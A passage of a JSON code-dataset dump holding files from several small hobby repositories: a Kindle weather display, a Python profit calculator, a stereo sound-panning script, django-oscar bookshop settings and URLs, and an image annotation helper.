'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\n\n#\n# Preprocess SVG\n#\n\n# Open SVG to process\noutput = codecs.open('weather-script-preprocess.svg', 'r', encoding='utf-8').read()\n\noutput = output.replace('UPDATE', \"updated \" + today.strftime(\"%H:%M\"))\noutput = output.replace('DATE', days_of_week[today.weekday()] + \", \" + day_one.strftime(\"%d.%m.%Y\"))\n\n# Insert icons and temperatures\noutput = output.replace('ICON_ONE',icons[0]).replace('ICON_TWO',icons[1]).replace('ICON_THREE',icons[2]).replace('ICON_FOUR',icons[3])\noutput = output.replace('HIGH_ONE',str(highs[0])).replace('HIGH_TWO',str(highs[1])).replace('HIGH_THREE',str(highs[2])).replace('HIGH_FOUR',str(highs[3]))\noutput = output.replace('LOW_ONE',str(lows[0])).replace('LOW_TWO',str(lows[1])).replace('LOW_THREE',str(lows[2])).replace('LOW_FOUR',str(lows[3]))\n\n# Insert days of week\noutput = output.replace('DAY_TWO',days_of_week[(day_one + 1*one_day).weekday()])\noutput = output.replace('DAY_THREE',days_of_week[(day_one + 2*one_day).weekday()])\noutput = output.replace('DAY_FOUR',days_of_week[(day_one + 3*one_day).weekday()])\n\n# Write output\ncodecs.open('weather-script-output.svg', 'w', encoding='utf-8').write(output)\n" }, { "alpha_fraction": 0.7253086566925049, "alphanum_fraction": 0.7746913433074951, "avg_line_length": 53, "blob_id": "9afa03d85af269675808d57ceded671e0f12399c", "content_id": "3764d58e08461d7fb38e60e61a815e4b6d1a20bf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 324, "license_type": "permissive", "max_line_length": 103, "num_lines": 6, "path": "/README.md", "repo_name": "badboy/kindle-weather-display", "src_encoding": "UTF-8", "text": "# Using a Kindle for status information\n\nThis is the code to generate a status information / weather forecast image to be displayed on a Kindle.\nRead more [in the blog post](http://fnordig.de/2015/05/14/using-a-kindle-for-status-information/)\n\nOriginal: <http://www.mpetroff.net/archives/2012/09/14/kindle-weather-display/>\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.724252462387085, "avg_line_length": 36.625, "blob_id": "852bcba0ce3a9f497d7ff5af0f7e5d1269812a69", "content_id": "419ba67f59e48b635c5613715e1b1288a5fff73d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 301, "license_type": "permissive", "max_line_length": 97, "num_lines": 8, "path": "/server/weather-script.sh", "repo_name": "badboy/kindle-weather-display", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\ncd \"$(dirname \"$0\")\"\n\npython2 weather-script.py && \\\nrsvg-convert --background-color=white -o weather-script-output.png weather-script-output.svg && \\\npngcrush -c 0 -ow weather-script-output.png #&& \\\n#cp -f weather-script-output.png /path/to/web/server/directory/weather-script-output.png\n" }, { "alpha_fraction": 0.6629834175109863, "alphanum_fraction": 0.6685082912445068, "avg_line_length": 12.923076629638672, "blob_id": "ce59c128c4abca73074eece25b895bcbff24b00e", "content_id": "750872b4d297fd1b5116206f533eb88f814ea2c5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 181, "license_type": "permissive", "max_line_length": 50, "num_lines": 13, "path": "/kindle/display-weather.sh", "repo_name": "badboy/kindle-weather-display", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\ncd \"$(dirname \"$0\")\"\n\nrm -f display.png\neips -c\neips -c\n\nif wget -q http://server/path/to/display.png; then\n\teips -g display.png\nelse\n\teips -g weather-image-error.png\nfi\n" } ]
4
verticalg33k/profit_2019
https://github.com/verticalg33k/profit_2019
84054a9112375950e1fc8c9f8adf770db9cd2058
3a4d63383bb88439d6428605bb6f53d18323e54a
ff076f4e2732f6d636f1bd8b1541b89f2e39277a
refs/heads/master
2020-12-09T22:15:52.508240
2020-01-12T18:05:25
2020-01-12T18:05:25
233,431,241
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7313432693481445, "alphanum_fraction": 0.7910447716712952, "avg_line_length": 32.5, "blob_id": "aa1f203fde8882607ef3099ed5343e02f05b9e69", "content_id": "73172e3db2c8bfb571ef1873fadfa6ddd5810147", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 67, "license_type": "no_license", "max_line_length": 52, "num_lines": 2, "path": "/README.md", "repo_name": "verticalg33k/profit_2019", "src_encoding": "UTF-8", "text": "# profit_2019\nBasic code to input values and output yearly profit.\n" }, { "alpha_fraction": 0.7197609543800354, "alphanum_fraction": 0.7613847255706787, "avg_line_length": 43.12727355957031, "blob_id": "e492cc62adbf907b42aa727b8bafc6b125ead2f5", "content_id": "345c36c6a09d723dbc910ea2f586bf83192b9930", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4853, "license_type": "no_license", "max_line_length": 114, "num_lines": 110, "path": "/profit_2019.py", "repo_name": "verticalg33k/profit_2019", "src_encoding": "UTF-8", "text": "#Hello, this is a simple code to calculate yearly profit for 2019.\nprint \"Welcome to the 2019 Profit Calculator!\"\nprint \"This tool will allow input of monthly data, compile it into quarterly data, and calculate year-end totals.\"\n\nprint \"Let's get to know each other.\"\nname = raw_input(\"What is your company's name?\")\nprint \"It's nice to meet you, %s! Let's get some information from you.\" % (name)\n#This first section takes first quarter profits and expenses and outputs monthly and first quarter totals.\njanuary_revenue = 1000\njanuary_expenses = 200\njanuary_profit = january_revenue - january_expenses\nprint \"Your profit for January 2019 is $\" + str(january_profit)\nfebruary_revenue = 3000\nfebruary_expenses = 700\nfebruary_profit = february_revenue - february_expenses\nprint \"Your profit for February 2019 is $\" + str(february_profit)\nmarch_revenue = 7000\nmarch_expenses = 400\nmarch_profit = march_revenue - march_expenses\nprint \"Your profit for March 2019 is $\" + str(march_profit)\n#This next section will add all of the expenses and profits for the first quarter of the year.\nquarter_1_expenses = january_expenses + february_expenses + march_expenses\nquarter_1_profits = january_profit + february_profit + march_profit\nprint \"Expenses are stacking up in the first quarter. Take a look at what you spent:\"\nprint \"Your total expenses for the first quarter were $\" + str(quarter_1_expenses)\nprint \"Yikes!\"\nprint \"However, you did a great job making profit.\"\nprint \"Your first quarter profits are $\" + str(quarter_1_profits)\nprint \"Great job!\"\n\n\n#Second quarter values\napril_revenue = 1000\napril_expenses = 800\napril_profit = april_revenue - april_expenses\nprint \"Your profit for April 2019 is $\" + str(april_profit)\nmay_revenue = 1500\nmay_expenses = 800\nmay_profit = may_revenue - may_expenses\nprint \"Your profit for May 2019 is $\" + str(may_profit)\njune_revenue = 1800\njune_expenses = 600\njune_profit = june_revenue - june_expenses\nprint \"Your profit for June 2019 is $\" + str(june_profit)\n#Second quarter totals\nquarter_2_expenses = april_expenses + may_expenses + june_expenses\nquarter_2_profits = april_profit + may_profit + june_profit\nprint \"Let's take a look at how you did in the second quarter of 2019.\"\nprint \"Your second quarter expenses were $\" + str(quarter_2_expenses)\nprint \"Wow!\"\nprint \"Now, for the most important information:\"\nprint \"Your Quarter 2 profits are $\" + str(quarter_2_profits)\nprint \"That's terrible. See if you can do better next quarter.\"\n\n\n#Third quarter values\njuly_revenue = 2500\njuly_expenses = 600\njuly_profit = july_revenue - july_expenses\nprint \"Your profit for July 2019 is $\" + str(july_profit)\naugust_revenue = 3000\naugust_expenses = 550\naugust_profit = august_revenue - august_expenses\nprint \"Your profit for August 2019 is $\" + str(august_profit)\nseptember_revenue = 4000\nseptember_expenses = 650\nseptember_profit = september_revenue - september_expenses\nprint \"Your profit for September 2019 is $\" + str(september_profit)\n#Third quarter totals\nquarter_3_profits = july_profit + august_profit + september_profit\nquarter_3_expenses = july_expenses + august_expenses + september_expenses\nprint \"Are you ready for your third quarter totals?\"\nprint \"Let's see how you did.\"\nprint \"Your third quarter expenses are $\" + str(quarter_3_expenses)\nprint \"Much better!\"\nprint \"Your third quarter profits are $\" + str(quarter_3_profits)\nprint \"What an improvement!\"\n\n\n#Fourth quarter values\noctober_revenue = 5000\noctober_expenses = 750\noctober_profit = october_revenue - october_expenses\nprint \"Your profit for October 2019 is $\" + str(october_profit)\nnovember_revenue = 6000\nnovember_expenses = 800\nnovember_profit = november_revenue - november_expenses\nprint \"Your profit for November 2019 is $\" + str(november_profit)\ndecember_revenue = 10000\ndecember_expenses = 700\ndecember_profit = december_revenue + december_expenses\nprint \"Your profit for December 2019 is $\" + str(december_profit)\n#Fourth quarter totals\nquarter_4_expenses = october_expenses + november_expenses + december_expenses\nquarter_4_profits = october_profit + november_profit + december_profit\nprint \"Let's finish the year strong! How did you do?\"\nprint \"Your fourth quarter expenses were $\" + str(quarter_4_expenses)\nprint \"Nice job reigning in your spending!\"\nprint \"Drumroll please!\"\nprint \"Your fourth quarter profits were $\" + str(quarter_4_profits)\nprint \"Amazing!\"\n\n#Year 2019 totals for all four quarters\ntotal_2019_expenses = quarter_1_expenses + quarter_2_expenses + quarter_3_expenses + quarter_4_expenses\ntotal_2019_profit = quarter_1_profits + quarter_2_profits + quarter_3_profits + quarter_4_profits\nprint \"Let's see how much money you spent in 2019.\"\nprint \"Your total 2019 expenses were $\" + str(total_2019_expenses)\nprint \"Not too bad.\"\nprint \"Finally, your total 2019 profit is $\" + str(total_2019_profit)\nprint \"What a great year!\"" } ]
2
Xiaoyang-Pan/MovingSounds
https://github.com/Xiaoyang-Pan/MovingSounds
c05fa4dce3cff1935338e7c195fd9d2e7c639468
507f93c728d7b4783b5d7b17597a0e4039270857
8de89bc62f6429150b4869ac03e6476fa42091dc
refs/heads/master
2022-12-01T23:51:39.358455
2020-08-19T22:22:25
2020-08-19T22:22:25
288,288,877
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.739130437374115, "alphanum_fraction": 0.7549406886100769, "avg_line_length": 24.299999237060547, "blob_id": "87b2a426f7ee5b0fb4332768f641bf61042e04a5", "content_id": "5ce9f5d34f7aa6aea98fbb72530ecba54bd76df3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 253, "license_type": "no_license", "max_line_length": 42, "num_lines": 10, "path": "/convert.py", "repo_name": "Xiaoyang-Pan/MovingSounds", "src_encoding": "UTF-8", "text": "#convert mp3 file to wav file\nfrom pydub import AudioSegment\n\n#source and dst music file names\nsrc = 'typewriter.mp3'\ndst = 'typewriter.wav'\n\n#import mp3 file and export as a wave file\nsound = AudioSegment.from_mp3(src)\nsound.export(dst,format = 'wav')\n" }, { "alpha_fraction": 0.6101922392845154, "alphanum_fraction": 0.6327670812606812, "avg_line_length": 42.86274337768555, "blob_id": "f0eae4055cad14ad728b8b43316029ccf3c10ee7", "content_id": "d4752f849ccd7de30303233a56c836d5b0dc272d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4474, "license_type": "no_license", "max_line_length": 138, "num_lines": 102, "path": "/movingsound.py", "repo_name": "Xiaoyang-Pan/MovingSounds", "src_encoding": "UTF-8", "text": "########################################################################\n# #\n# Playing moving Sound in headphones #\n# #\n# 1.Imported a wave audio file #\n# 2.Controlled the magnitude of input audio signals #\n# 3.Added a time dealy to the input audio signals #\n# 4.Outputted and Played a wave file with moving sound effects #\n# #\n########################################################################\n\nimport soundfile as sf\nimport numpy as np\nfrom pydub import AudioSegment\nfrom pydub.playback import play\n\n#import input music wave file\ndata, samplerate = sf.read('typewriter.wav')\n\naudio_sample = data.shape[0]\n\n#Determine the channel size\nif len(data.shape) == 2:\n channels = data.shape[1]\nelif len(data.shape) == 1:\n channels = 2\n data = data.reshape(audio_sample,1)\n data = data.repeat(2,1)\n\n#choose the time offset between the left and right sterro sound\n#between 0.001% of the number of audio samples read\ntime_offset = round(1*(10**(-5))*audio_sample)\ntotal_sample = round(2*time_offset+audio_sample)\n\n#Initialize the coefficient matric\nleft_coe = np.zeros((total_sample,1))\nright_coe = np.zeros((total_sample,1))\n\n#Controlled the magnitude of the audio signal respect to its total number of audio samples\nratio = 1.0/audio_sample\n\n\n#obtain a user input ranged from 1 to 2\n#1 means slowest sound moving speed, 2 means fastest sound moving speed.\nfactor = input(\"Please enter a number between 1 to 2; it relates to the speed of moving sounds: \")\nwhile True:\n try :\n factor = float(factor)\n \n if factor <1 or factor >2:\n factor = float(input(\"Your input is invalid. Please enter a number between 1 to 2: \"))\n else:\n break\n except:\n factor = input(\"Your input is invalid. Please enter a number between 1 to 2: \")\n\n\n#Create a coefficient matrix to controll the magintude of the audio samples\n#The sounds start from left moving to right in the beginning, and moving back to the right in the end\nfor i in range(total_sample):\n if i <= time_offset:\n left_coe[i] = 1-i*ratio*factor\n right_coe[i] = 0\n elif i <=audio_sample/2:\n left_coe[i] = 1-i*ratio*factor\n right_coe[i] = (i-time_offset)*ratio*factor\n elif i <= audio_sample/2+time_offset:\n left_coe[i] = 1-audio_sample/2*ratio*factor\n right_coe[i] = (i-time_offset)*ratio*factor\n elif i <= audio_sample/2+2*time_offset:\n left_coe[i] = 1-audio_sample/2*ratio*factor\n right_coe[i] = audio_sample/2*factor*ratio\n else:\n left_coe[i] = 1-audio_sample/2*ratio*factor + (i-audio_sample/2-2*time_offset)*ratio*factor\n right_coe[i] = audio_sample*factor*ratio-(i-audio_sample/2-2*time_offset)*ratio*factor\n\n\nnew_left = np.zeros((total_sample,1))\nnew_right = np.zeros((total_sample,1))\n\n#matrix multiplication\ndef matrix_multiply(coe_matrix,audio_data,start_in,end_in,audio_index,offset):\n return np.multiply(coe_matrix[start_in+offset:end_in+offset,0],audio_data[start_in:end_in,audio_index])\n\n\n#obtain the moving left and right steroe sounds by multiply the coefficient matrixs with the original values\nnew_left[0:audio_sample//2,0] = matrix_multiply(left_coe,data,0,audio_sample//2,0,0)\nnew_left[audio_sample//2:audio_sample//2+2*time_offset,0] = left_coe[audio_sample//2,0]*data[audio_sample//2,0]\nnew_left[audio_sample//2+2*time_offset:total_sample,0] = matrix_multiply(left_coe,data,audio_sample//2,audio_sample,0,2*time_offset)\n\nnew_right[time_offset:audio_sample//2+time_offset,0] = matrix_multiply(right_coe,data,0,audio_sample//2,1,time_offset)\nnew_right[audio_sample//2+time_offset:audio_sample//2+2*time_offset,0] =right_coe[audio_sample//2+time_offset,0] * data[audio_sample//2,1]\nnew_right[audio_sample//2+2*time_offset:,0] = matrix_multiply(right_coe,data,audio_sample//2,audio_sample,1,2*time_offset)\n\n#and concatenate two matric and turn into one audio file\n#output the result as a wav file\nnew_song = np.concatenate((new_left[:,0:1],new_right),axis = 1)\nsf.write('new_typerwriter.wav',new_song,samplerate)\n\n#play the audio file with moving effects\nplay_back = AudioSegment.from_wav('new_typerwriter.wav')\nplay(play_back)\n" }, { "alpha_fraction": 0.7824709415435791, "alphanum_fraction": 0.7898627519607544, "avg_line_length": 51.61111068725586, "blob_id": "8dbe2f0f13d10857e615450e3fa02680155a6af3", "content_id": "5787fedc3c760da052c9c9607ae52acc09fec5ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 947, "license_type": "no_license", "max_line_length": 122, "num_lines": 18, "path": "/README.md", "repo_name": "Xiaoyang-Pan/MovingSounds", "src_encoding": "UTF-8", "text": "# MovingSounds\n\nThis project aims to creating a sound moving effect using signal processing techniques. \nAdd time delays to the sound and manipulate the magnitudes of left and right stereo sounds to create a moving sound effect\nThe results audio file will move from left to right, and from right to left\nCodes were implemented using Python and MATLAB\n\n## Python Version\n* Various libraray, such as SoundFile, NumPy, pydub, are needed to be installed\n* mp3 and wave file are supported, but mp3 files must be converted to wave file before processing using convert.py\n* Users need to enter a number between 1 and 2, which is related to the speed of moving sounds\n* Resulted file will be played in the end\n\n## MATLAB VERSION\n* Signal Processing Toolbox is needed to be installed\n* mp3 and wave files are supported\n* Users need to enter a number between 1 and 2, which is related to the speed of moving sounds\n* Resulted file will be played in the end\n" } ]
3
halfnibble/oscar-demo
https://github.com/halfnibble/oscar-demo
8eac2aed4fbec5ca5b21bd8310814c091b5757e9
ae67f1b1751564676f79096ef993cff00ed42fd3
eceea36427547ba94c58503d115397d224a2b549
refs/heads/master
2021-01-22T07:32:41.654107
2014-10-16T05:06:22
2014-10-16T05:06:22
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5623435974121094, "alphanum_fraction": 0.5653014779090881, "avg_line_length": 26.29813575744629, "blob_id": "ef7314fdf474865cd4d4b823adccf92e02c4775c", "content_id": "cfb8033f98c21410051309245cb1f7c6e73b8b59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8790, "license_type": "no_license", "max_line_length": 78, "num_lines": 322, "path": "/bookshop/bookshop/settings.py", "repo_name": "halfnibble/oscar-demo", "src_encoding": "UTF-8", "text": "\"\"\"\nDjango settings for bookshop project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nPROJECT_DIR = os.path.dirname(__file__)\nlocation = lambda x: os.path.join(\n os.path.dirname(os.path.realpath(__file__)), x)\n\n# Retreive secret settings\nfrom .secret import *\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.request\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.static\",\n \"django.core.context_processors.tz\",\n \"django.contrib.messages.context_processors.messages\",\n 'oscar.apps.search.context_processors.search_form',\n 'oscar.apps.promotions.context_processors.promotions',\n 'oscar.apps.checkout.context_processors.checkout',\n 'oscar.apps.customer.notifications.context_processors.notifications',\n 'oscar.core.context_processors.metadata',\n)\n\nfrom oscar import OSCAR_MAIN_TEMPLATE_DIR\n\nTEMPLATE_DIRS = (\n location('templates'),\n os.path.join(OSCAR_MAIN_TEMPLATE_DIR, 'templates'),\n OSCAR_MAIN_TEMPLATE_DIR,\n)\n\nALLOWED_HOSTS = []\n\n\n# Application definition\nfrom oscar import get_core_apps\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.flatpages',\n 'south',\n 'compressor',\n 'paypal',\n] + get_core_apps([\n 'apps.shipping',\n 'apps.checkout'])\n\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'oscar.apps.basket.middleware.BasketMiddleware',\n 'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',\n)\n\nAUTHENTICATION_BACKENDS = (\n 'oscar.apps.customer.auth_backends.Emailbackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\n\nROOT_URLCONF = 'bookshop.urls'\n\nWSGI_APPLICATION = 'bookshop.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'oscar_demo',\n 'USER': DB_USERNAME,\n 'PASSWORD': DB_PASSWORD,\n 'HOST': '',\n 'PORT': '',\n 'ATOMIC_REQUESTS': True, # Django 1.6+\n }\n}\n\nHAYSTACK_CONNECTIONS = {\n 'default': {\n 'ENGINE': 'haystack.backends.simple_backend.SimpleEngine',\n },\n}\n\nSITE_ID = 1\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'bookshop', 'static')\n\n# Media files\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'bookshop', 'media')\n\nfrom oscar.defaults import *\n\n# Order pipeline\nOSCAR_INITIAL_ORDER_STATUS = 'Pending'\nOSCAR_INITIAL_LINE_STATUS = 'Pending'\nOSCAR_ORDER_STATUS_PIPELINE = {\n 'Pending': ('Being processed', 'Cancelled',),\n 'Being processed': ('Processed', 'Cancelled',),\n 'Cancelled': (),\n}\n\n# Override Oscar settings\nOSCAR_SHOP_NAME = 'Port Bookstore'\nOSCAR_SHOP_TAGLINE = 'Great Books for Geeks!'\nOSCAR_DEFAULT_CURRENCY = 'USD'\nOSCAR_CURRENCY_LOCALE = 'en_US'\n\n# PayPal Payflow\nOSCAR_ALLOW_ANON_CHECKOUT = True\n\n# Taken from PayPal's documentation - these should always work in the sandbox\nPAYPAL_SANDBOX_MODE = True\nPAYPAL_CALLBACK_HTTPS = False\nPAYPAL_API_VERSION = '88.0'\n\nPAYPAL_PAYFLOW_DASHBOARD_FORMS = True\n\n# Add Payflow dashboard stuff to settings\nfrom django.utils.translation import ugettext_lazy as _\n\ndef display_menu(user, url_name, url_args=None, url_kwargs=None):\n\t# Don't display catalogue for certain users\n\tstaff_only = ['[email protected]',]\n\tif user.email in staff_only:\n\t\treturn False\n\telse:\n\t\treturn True\n\nOSCAR_DASHBOARD_NAVIGATION = [\n {\n 'label': _('Dashboard'),\n 'icon': 'icon-th-list',\n 'url_name': 'dashboard:index',\n },\n {\n 'label': _('Catalogue'),\n 'access_fn': display_menu,\n 'icon': 'icon-sitemap',\n 'children': [\n {\n 'label': _('Products'),\n 'url_name': 'dashboard:catalogue-product-list',\n },\n {\n 'label': _('Product Types'),\n 'url_name': 'dashboard:catalogue-class-list',\n },\n {\n 'label': _('Categories'),\n 'url_name': 'dashboard:catalogue-category-list',\n },\n {\n 'label': _('Ranges'),\n 'url_name': 'dashboard:range-list',\n },\n {\n 'label': _('Low stock alerts'),\n 'url_name': 'dashboard:stock-alert-list',\n },\n ]\n },\n {\n 'label': _('Fulfilment'),\n 'icon': 'icon-shopping-cart',\n 'children': [\n {\n 'label': _('Orders'),\n 'url_name': 'dashboard:order-list',\n },\n {\n 'label': _('Statistics'),\n 'url_name': 'dashboard:order-stats',\n },\n {\n 'label': _('Partners'),\n 'url_name': 'dashboard:partner-list',\n },\n # The shipping method dashboard is disabled by default as it might\n # be confusing. Weight-based shipping methods aren't hooked into\n # the shipping repository by default (as it would make\n # customising the repository slightly more difficult).\n # {\n # 'label': _('Shipping charges'),\n # 'url_name': 'dashboard:shipping-method-list',\n # },\n ]\n },\n {\n 'label': _('Customers'),\n 'icon': 'icon-group',\n 'children': [\n {\n 'label': _('Customers'),\n 'url_name': 'dashboard:users-index',\n },\n {\n 'label': _('Stock alert requests'),\n 'url_name': 'dashboard:user-alert-list',\n },\n ]\n },\n {\n 'label': _('Offers'),\n 'icon': 'icon-bullhorn',\n 'children': [\n {\n 'label': _('Offers'),\n 'url_name': 'dashboard:offer-list',\n },\n {\n 'label': _('Vouchers'),\n 'url_name': 'dashboard:voucher-list',\n },\n ],\n },\n {\n 'label': _('Content'),\n 'icon': 'icon-folder-close',\n 'children': [\n {\n 'label': _('Content blocks'),\n 'url_name': 'dashboard:promotion-list',\n },\n {\n 'label': _('Content blocks by page'),\n 'url_name': 'dashboard:promotion-list-by-page',\n },\n {\n 'label': _('Pages'),\n 'url_name': 'dashboard:page-list',\n },\n {\n 'label': _('Email templates'),\n 'url_name': 'dashboard:comms-list',\n },\n {\n 'label': _('Reviews'),\n 'url_name': 'dashboard:reviews-list',\n },\n ]\n },\n {\n 'label': _('Reports'),\n 'icon': 'icon-bar-chart',\n 'url_name': 'dashboard:reports-index',\n },\n {\n 'label': _('PayPal'),\n 'icon': 'icon-globe',\n 'children': [\n {\n 'label': _('PayFlow transactions'),\n 'url_name': 'paypal-payflow-list',\n },\n {\n 'label': _('Express transactions'),\n 'url_name': 'paypal-express-list',\n },\n ]\n },\n]\n" }, { "alpha_fraction": 0.558080792427063, "alphanum_fraction": 0.7171717286109924, "avg_line_length": 17, "blob_id": "2f5015fead5dd056141d556f27230d0b53b6dc0d", "content_id": "77849ea6829887bd0e03119329d7e0ef7e8e88d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 396, "license_type": "no_license", "max_line_length": 26, "num_lines": 22, "path": "/requirements.txt", "repo_name": "halfnibble/oscar-demo", "src_encoding": "UTF-8", "text": "Babel==1.3\nDjango==1.6\nMySQL-python==1.2.5\nPillow==2.4.0\nSouth==0.8.4\nUnidecode==0.04.16\nargparse==1.2.1\ndjango-appconf==0.6\ndjango-compressor==1.3\ndjango-extra-views==0.6.5\ndjango-haystack==2.3.1\ndjango-localflavor==1.0\ndjango-oscar==0.7\ndjango-oscar-paypal==0.9.3\ndjango-treebeard==2.0\nphonenumbers==6.0.0a\npurl==1.0\npytz==2014.7\nrequests==2.4.3\nsix==1.8.0\nsorl-thumbnail==11.12\nwsgiref==0.1.2\n" }, { "alpha_fraction": 0.7185534834861755, "alphanum_fraction": 0.7248427867889404, "avg_line_length": 38.78125, "blob_id": "44a5d898a273036f1d811a1f62b5e293c64ced51", "content_id": "2b44960f8f09d70a58a9d0f53ab037c742ad596a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1272, "license_type": "no_license", "max_line_length": 74, "num_lines": 32, "path": "/bookshop/bookshop/urls.py", "repo_name": "halfnibble/oscar-demo", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nfrom django.conf.urls.i18n import i18n_patterns\nfrom oscar.app import application\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.conf.urls.static import static\n\nfrom apps.app import application\nfrom paypal.payflow.dashboard.app import application as payflow\nfrom paypal.express.dashboard.app import application as express_dashboard\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n (r'^i18n/', include('django.conf.urls.i18n')),\n url(r'^admin/', include(admin.site.urls)),\n # PayPal Express integration...\n (r'^checkout/paypal/', include('paypal.express.urls')),\n # Dashboard views for Payflow Pro\n (r'^dashboard/paypal/payflow/', include(payflow.urls)),\n # Dashboard views for Express\n (r'^dashboard/paypal/express/', include(express_dashboard.urls)),\n (r'', include(application.urls)),\n)\n\n# This is only needed when using runserver.\nif settings.DEBUG:\n urlpatterns = patterns('',\n url(r'^media/(?P<path>.*)$', 'django.views.static.serve', # NOQA\n {'document_root': settings.MEDIA_ROOT, 'show_indexes': True}),\n ) + staticfiles_urlpatterns() + urlpatterns # NOQA" } ]
3
CGump/dataset-tools
https://github.com/CGump/dataset-tools
465cac35bf25f7ea7133f0bdf1be7387d2dd80ee
086bb6ac6d91e966a112fc21402d5e1a777e907b
818b1b1f9ff032a167168b524dbceb9f381e74a7
refs/heads/master
2020-08-22T18:28:02.280814
2020-05-20T11:30:39
2020-05-20T11:30:39
216,457,233
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5909822583198547, "alphanum_fraction": 0.5974234938621521, "avg_line_length": 22.923076629638672, "blob_id": "e810283a79438a73d0ff5738576937a0767667f6", "content_id": "0bddf933bab43eb060c9030c01e3526d88f55c09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 621, "license_type": "no_license", "max_line_length": 72, "num_lines": 26, "path": "/voc_xml.py", "repo_name": "CGump/dataset-tools", "src_encoding": "UTF-8", "text": "import os\nimport xml.etree.ElementTree as ET\nfrom os import getcwd\n\nROOT = 'VOCdevkit/VOC2007/'\n\ndef get_name(txt_path):\n with open(txt_path) as f:\n pic_names = f.readlines()\n pic_names = [c.strip() for c in pic_names]\n return pic_names\n\n\n\nif __name__ == \"__main__\":\n image_name = get_name(ROOT+'ImageSets/Main/train.txt')\n print(image_name)\n\n for n in image_name:\n xml_path = os.path.join(ROOT, 'Annotations', '{}.xml'.format(n))\n print(xml_path)\n doc = ET.parse(xml_path)\n root = doc.getroot()\n mything = root.find('name')\n print(mything)\n break" }, { "alpha_fraction": 0.46556776762008667, "alphanum_fraction": 0.47069597244262695, "avg_line_length": 46.08620834350586, "blob_id": "ed5b08579c1bd8032e6dfa60caf2c741e96599c3", "content_id": "1d248d7904de9dbacae51cebb1572a50b3b686f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2814, "license_type": "no_license", "max_line_length": 93, "num_lines": 58, "path": "/auto-image-annotation.py", "repo_name": "CGump/dataset-tools", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport os, sys\nimport glob\nfrom PIL import Image\n\nclass Auto_ann():\n def __init__(self):\n self.scr_img_dir = \"auto-annotation/img\" # 图像存储路径\n self.scr_xml_dir = \"auto-annotation/xml\" # 标注存储路径\n self.scr_txt_dir = \"auto-annotation/txt\" # 识别结果路径\n self.img_list = glob.glob(self.scr_img_dir + \"/*.jpg\") #[\"1.jpg\",\"2.jpg\"...]\n self.folder = self.scr_img_dir.split('/')[-1]\n self.img_basename = [os.path.basename(item) for item in 